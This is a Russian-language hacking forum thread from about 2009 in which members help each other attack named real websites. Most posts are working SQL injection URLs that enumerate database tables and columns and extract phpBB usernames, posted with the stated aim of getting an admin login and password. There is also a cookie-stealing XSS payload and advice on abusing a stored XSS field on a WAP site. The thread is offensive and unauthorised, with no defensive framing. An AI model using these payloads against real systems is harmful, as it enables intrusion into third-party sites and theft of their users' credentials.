Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Mixon

    Mixon Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    394
    Likes Received:
    119
    Reputations:
    12
    Ну,я так пишу,такой лексикон у мну,ничё тут не сделаешь...) вопщем та идея с css никак не прокатит вопше......надо чтото другое думать(( Вопшем тут такой баг,тут с редактироваем инфы,поле Имя заносится в mysql,и в нем можно любой код писать,там без фильтров всё,xss отлично работает,ну вот что можно бы придумать окроме xss? потому что ето вап сайт,и тут хсс почти бесполезно,потому что там почти все с телфонов,где яваскрипт не идет...(
     
    #4601 Mixon, 13 Jan 2009
    Last edited: 13 Jan 2009
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    997
    Likes Received:
    905
    Reputations:
    587
    Meta refresh, как я писал выше, только его надо будет быстро удалить, или поработать некоторое время в качестве прокси, который будет этот редирект вырезать с отдаваемой страницы.

    P.S.
    А если перерисовать страницу стилями то вернуть всё обратно будет просто, т.к. тебе надо будет либо почистить тот CSS который инклудится, либо поставить display: none !important; на всё то что ты добавил на страницу, и display: block !important; на всё что убрал.
     
    #4602 Qwazar, 13 Jan 2009
    Last edited: 13 Jan 2009
    1 person likes this.
  3. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Народ, нужна помощь, есть скуля с таблами, есть табла phpbb_users, но она я так понял пустая....о воще все перебрал..не работают..помогите плиз, в чём ошибка?
    версия 5.0.51a
    скуля с таблами
    Code:
    http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_name,4,5,6,7%20FROM%20INFORMATION_SCHEMA.TABLES
    нада логин и пасс админа
     
    #4603 vakula, 13 Jan 2009
    Last edited: 13 Jan 2009
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,table_schema,4,5,6,7+from+information_schema.tables+where+table_name=0x70687062625F7573657273
    forumvdn
    http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,database(),4,5,6,7
    vdn

    Таблица в другой базе

    Поля
    http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=0x70687062625F7573657273

    Вот вывод
    http://www.vdn.dp.ua/index.php?action=article&id=999%20UNION%20SELECT%201,2,username,4,5,6,7%20FROM%20forumvdn.phpbb_users

    А вот хелп на будующее:
    https://forum.antichat.ru/showpost.php?p=1051237&postcount=4597
     
    2 people like this.
  5. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    Мужики, это уязвимость?

    http://cronos.net.ru/qwests.php?id=1'
     
  6. preda1or

    preda1or Member

    Joined:
    27 Oct 2008
    Messages:
    165
    Likes Received:
    96
    Reputations:
    6
    раскрытие путей, не более
     
  7. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    565
    Likes Received:
    309
    Reputations:
    27
    open_basedir ()

    xss
    http://cronos.net.ru/database.php?type=%3Cscript%3Ealert(document.cookie)%3C/script%3E
     
    #4607 AkyHa_MaTaTa, 14 Jan 2009
    Last edited: 14 Jan 2009
  8. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    угу...спс.

    а не подскажите прогу для поиска sql уязвимостей на сайте?
    а язна, гугль рулит....но хотелось бы ваши личные советы
     
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Там рядом скуля...

    Code:
    http://cronos.net.ru/database.php?id=4664+union+select+1,unhex(hex(version())),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22--
    Руки ^^
     
  10. Octave_Parango

    Joined:
    6 Nov 2008
    Messages:
    83
    Likes Received:
    11
    Reputations:
    -1
    Всем, хай.
    Подскажите.
    Есть скуля, далее:
    =-77+union+select+1,2,3,4,5,6,7,8,9,10--
    вываливается ошибка:
    You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10-- ' at line 4
    Я так понимаю я не правильно строю запрос?
    Попробовал несколько вариантов, тоже самое.
    Подскажите, где косяк?
     
  11. sabe

    sabe Elder - Старейшина

    Joined:
    16 Mar 2007
    Messages:
    313
    Likes Received:
    178
    Reputations:
    14
    =-77'+union+select+1,2,3,4,5,6,7,8,9,10--

    ?
     
  12. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    дай ссыль полную
    это скуля
     
  13. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    мужики, 407 таблиц...помогите найти нужную, плиз

    Code:
    http://soft.dndz.dp.ua/program.php?id=-781%20UNION%20SELECT%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15%20FROM%20INFORMATION_SCHEMA.TABLES%20limit%20392,1%20--
     
  14. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Вот запрос - выдергивает все таблицы, в которых есть колонка "password"

    Code:
    http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x70617373776f7264--
    С колонкой - login

    Code:
    http://soft.dndz.dp.ua/program.php?id=-781+UNION+SELECT+1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15+FROM+INFORMATION_SCHEMA.columns+where+column_name=0x6c6f67696e--
     
    #4614 R1dex, 14 Jan 2009
    Last edited: 14 Jan 2009
  15. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    нихрена не пойму, там на сайте есть форум....а где табла с юзерами??? :confused:
     
    #4615 vakula, 14 Jan 2009
    Last edited: 14 Jan 2009
  16. vakula

    vakula New Member

    Joined:
    20 Jan 2008
    Messages:
    41
    Likes Received:
    4
    Reputations:
    0
    а как в таком случае прописывать таблу? from users? или в хексе?
     
  17. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    from+users--
     
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+order+by+23&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
    Насколько я помню, в access, в запросе обязательно должна присутствовать таблица.. Вот только ни одну не подобрать...
     
    #4618 R1dex, 14 Jan 2009
    Last edited: 14 Jan 2009
  19. big_BRAT

    big_BRAT Elder - Старейшина

    Joined:
    23 Dec 2006
    Messages:
    78
    Likes Received:
    64
    Reputations:
    7
    http://www.eurashe.eu/RunScript.asp?page=&Article_ID=97+union+select+*+from+MSysObjects&NWS=NWS&ap=NewsDetail.asp&p=ASP%5C~Pg0.asp
    это Microsoft Access статья https://forum.antichat.ru/showthread.php?t=50550

    ===== R1dex
    И что? Это системная табла и как я вижу - доступ закрыт.

    я не видел что ты уже отписался ;)
     
    #4619 big_BRAT, 14 Jan 2009
    Last edited: 14 Jan 2009
    1 person likes this.
  20. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    И что? Это системная табла и как я вижу - доступ закрыт.
     
Loading...
Thread Status:
Not open for further replies.